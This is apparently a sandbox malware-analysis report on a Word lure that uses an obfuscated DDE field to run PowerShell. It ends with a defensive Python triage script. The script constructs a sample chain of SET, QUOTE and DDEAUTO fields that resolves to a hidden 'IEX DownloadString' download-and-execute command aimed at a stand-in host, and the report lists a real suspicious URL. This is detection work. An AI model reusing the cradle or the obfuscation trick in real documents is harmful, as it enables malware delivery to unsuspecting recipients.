Verdict: MALICIOUS
Risk score: 150

Malware Insights

MITRE ATT&CK
- T1059.001 PowerShell
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The sample contains a malicious DDE field that, when evaluated, runs a PowerShell command. That PowerShell command downloads a second-stage payload from a URL and executes it. The DDE command string itself is obfuscated with SET and QUOTE fields, which reconstruct it at field-evaluation time so that it does not appear literally in the document. The combination of DDE execution and external hyperlinks strongly indicates intent to download and run further malicious content.
Heuristics (5)

- Malicious DDE command [critical] OOXML_DDE_MALICIOUSDDE
  A DDE field in word/document.xml launches a dangerous executable: powershell
- Word field chain (SET/REF) co-located with DDE [high] OOXML_FIELD_SET_REF_CHAINING2
  SET/REF variable pair(s) co-occur with DDE field(s) in word/document.xml
- LOLBin token sequence in document text [high] SE_LOLBIN_RUN_COMMAND
  Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, ...) within 220 characters of a dangerous flag, command verb, or URL. This is a visible "run this" instruction in HTML/PDF/RTF lure bodies, or, in macro-laden Office files, the macro's own string-pool entries appearing adjacent in extracted text.
- External hyperlinks (3) [low] OOXML_EXTERNAL_HYPERLINKS
  Document contains 3 external hyperlinks; clickable URLs are stored as external relationships in word/_rels/document.xml.rels. First target: http://ckattrans.spb.ru/
- Embedded URL [info] EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. The schemas.openxmlformats.org and schemas.microsoft.com entries are XML namespace URIs from the document's own markup, not links a user can follow.
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
  - http://ckattrans.spb.ru/ (document hyperlink)
  - https://spb.hh.ru/employer/600756 (document hyperlink)
  - https://spb.hh.ru/employer/995956 (document hyperlink)
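The following script is an added example of how a triage tool reconstructs the SET/QUOTE/REF-obfuscated DDE command described in the summary and enumerates external hyperlinks as flagged by OOXML_EXTERNAL_HYPERLINKS. It is not the analyzer's own code. It builds a constructed minimal .docx in memory (the field chain, the hypothetical second-stage URL lure.example.invalid and the hyperlink target are all made up for illustration, not taken from the analysed sample), then walks word/document.xml in document order and evaluates the fields the way Word does: QUOTE renders numeric arguments as the corresponding characters, SET stores a value under a bookmark name, REF reads it back, and DDE/DDEAUTO launches the reconstructed command. Function and variable names are this example's own.

```python
"""Static triage of a .docx for DDE field chains and external hyperlinks (added example)."""
import io
import json
import re
import zipfile
import xml.etree.ElementTree as ET

W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
LOLBINS = ("powershell", "cmd", "mshta", "rundll32", "regsvr32",
           "wscript", "cscript", "certutil")
_TOK = re.compile(r'"[^"]*"|\S+')      # field-code tokens: quoted strings or bare words


def _run(instr):
    """One w:r carrying field instruction text."""
    return f'<w:r><w:instrText xml:space="preserve">{instr}</w:instrText></w:r>'


def _fld(kind):
    """One w:r carrying a field boundary marker (begin / separate / end)."""
    return f'<w:r><w:fldChar w:fldCharType="{kind}"/></w:r>'


def build_sample_docx():
    """Constructed lure (assumption, not the analysed sample):
    { SET c { QUOTE 112 111 ... } } { DDEAUTO { REF c } "<args>" }
    so the string 'powershell' never appears literally in document.xml."""
    codes = " ".join(str(ord(ch)) for ch in "powershell")   # QUOTE-encoded 'powershell'
    stage2 = "http://lure.example.invalid/s"                  # hypothetical second-stage URL
    body = (
        _fld("begin") + _run(" SET c ")
        + _fld("begin") + _run(f" QUOTE {codes} ") + _fld("separate") + _fld("end")
        + _fld("end")
        + _fld("begin") + _run(" DDEAUTO ")
        + _fld("begin") + _run(" REF c ") + _fld("separate") + _fld("end")
        + _run(f" \"-w hidden -c IEX((New-Object Net.WebClient).DownloadString('{stage2}'))\" ")
        + _fld("separate") + "<w:r><w:t>Loading...</w:t></w:r>" + _fld("end")
    )
    doc = f'<w:document xmlns:w="{W}"><w:body><w:p>{body}</w:p></w:body></w:document>'
    rels = ('<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId1" TargetMode="External" Target="http://lure.example.invalid/" '
            'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/>'
            '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", doc)
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


def _eval(instr, variables, findings):
    """Evaluate one field instruction string and return its result text."""
    toks = _TOK.findall(instr)
    if not toks:
        return ""
    kw, args = toks[0].upper(), [t.strip('"') for t in toks[1:]]
    if kw == "QUOTE":                       # numeric arguments become characters
        return "".join(chr(int(a)) if a.isdigit() else a for a in args)
    if kw == "SET" and len(args) >= 2:      # SET name value -> bookmark variable
        variables[args[0]] = " ".join(args[1:])
        return ""
    if kw == "REF" and args:                # REF name -> stored value
        return variables.get(args[0], "")
    if kw in ("DDE", "DDEAUTO"):            # the launch primitive: record resolved command
        findings.append({"field": kw, "command": " ".join(args)})
    return ""


def extract_fields(document_xml):
    """Walk runs in document order; nested fields resolve innermost-first into their parent."""
    variables, findings, stack = {}, [], []
    for el in ET.fromstring(document_xml).iter():
        if el.tag == f"{{{W}}}fldChar":
            kind = el.get(f"{{{W}}}fldCharType")
            if kind == "begin":
                stack.append({"instr": "", "result": False})
            elif kind == "separate" and stack:
                stack[-1]["result"] = True          # result text follows; ignore it
            elif kind == "end" and stack:
                value = _eval(stack.pop()["instr"], variables, findings)
                if stack and not stack[-1]["result"]:
                    stack[-1]["instr"] += f' "{value}" ' if " " in value else f" {value} "
        elif el.tag == f"{{{W}}}instrText" and stack and not stack[-1]["result"]:
            stack[-1]["instr"] += el.text or ""
    return findings


def external_hyperlinks(docx_bytes):
    """Clickable URLs live as external relationships in word/_rels/document.xml.rels."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if "word/_rels/document.xml.rels" not in z.namelist():
            return []
        rels = ET.fromstring(z.read("word/_rels/document.xml.rels"))
    return [r.get("Target") for r in rels
            if r.get("TargetMode") == "External" and r.get("Type", "").endswith("/hyperlink")]


def triage(docx_bytes):
    """Resolved DDE commands (tagged with the LOLBin they launch) plus external hyperlinks."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        findings = extract_fields(z.read("word/document.xml"))
    for f in findings:
        head = f["command"].split()[0].lower() if f["command"] else ""
        f["lolbin"] = next((b for b in LOLBINS if b in head), None)
    return {"dde": findings, "external_hyperlinks": external_hyperlinks(docx_bytes)}


if __name__ == "__main__":
    print(json.dumps(triage(build_sample_docx()), indent=2))
```

Because the evaluator walks runs in document order and substitutes each nested field's value into its parent only after the nested field closes, a SET defined earlier in the body is visible to a later REF, which is exactly the ordering Word relies on and the ordering that OOXML_FIELD_SET_REF_CHAINING2 looks for. Grepping document.xml for "powershell" would miss this sample entirely; the string only exists after QUOTE is evaluated.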